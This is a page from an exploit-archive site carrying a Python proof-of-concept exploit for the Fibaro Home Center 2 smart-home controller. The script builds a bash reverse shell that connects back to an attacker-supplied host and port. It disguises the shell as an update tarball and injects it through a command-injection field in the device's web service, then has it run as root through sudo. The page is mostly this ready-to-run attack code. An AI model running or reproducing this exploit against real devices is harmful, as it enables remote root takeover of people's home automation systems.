首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation
来源:vfocus.net 作者:forsec 发布时间:2017-09-28  
#!/usr/bin/python
 
import requests
import argparse
import urllib
import base64
import tarfile
import os
 
parser = argparse.ArgumentParser(description='Fibaro RCE')
parser.add_argument('--rhost')
parser.add_argument('--lhost')
parser.add_argument('--lport')
args = parser.parse_args()
 
f = open('run.sh', 'w')
f.write('#!/bin/bash\n')
f.write('/bin/bash -i >& /dev/tcp/' + args.lhost + '/' + args.lport + ' 0>&1\n')
f.close()
 
os.chmod('run.sh', 0777)
 
tar = tarfile.open("root.tar.gz", "w:gz")
tar.add("run.sh")
tar.close()
 
with open("root.tar.gz", "rb") as tarfile:
tar64 = base64.b64encode(tarfile.read())
 
wwwexec = urllib.quote_plus(base64.b64encode("echo '" + tar64 + "' | base64 -d > /tmp/patch.tar.gz && sudo update --manual /tmp/patch.tar.gz"))
 
os.remove('run.sh')
os.remove('root.tar.gz')
 
headers = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:51.0) Gecko/20100101 Firefox/51.0',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
'X-Fibaro-Version': '2',
'X-Requested-With': 'XMLHttpRequest',
}
 
data = 'deviceID=1&deviceName=&deviceType=&cmd1=`echo${IFS}' + wwwexec + '|base64${IFS}-d|/bin/bash`&cmd2=&roomID=1&roomName=&sectionID=&sectionName=&lang=en'
print "[+] Popping a root shell..."
 
requests.post('http://' + args.rhost + '/services/liliSetDeviceCommand.php', headers=headers, data=data, verify=False)
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Yahoo! Messenger Webcam 8.1 Ac
·Apache 2.2.0 - 2.2.11 Remote e
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·HT Editor File openning Stack
  相关文章
·Oracle WebLogic Server 10.3.6.
·NodeJS Debugger Command Inject
·LAquis SCADA 4.1.0.2385 - Dire
·FLIR Systems FLIR Thermal Came
·FLIR Systems FLIR Thermal Came
·Cisco Prime Collaboration Prov
·Oracle 9i XDB 9.2.0.1 - HTTP P
·DiskBoss Enterprise 8.4.16 - L
·Supervisor 3.0a1 - 3.3.2 - XML
·DiskBoss Enterprise 8.4.16 - '
·Trend Micro OfficeScan 11.0/XG
·Disk Pulse Enterprise 10.0.12
  推荐广告
CopyRight © 2002-2018 VFocuS.Net All Rights Reserved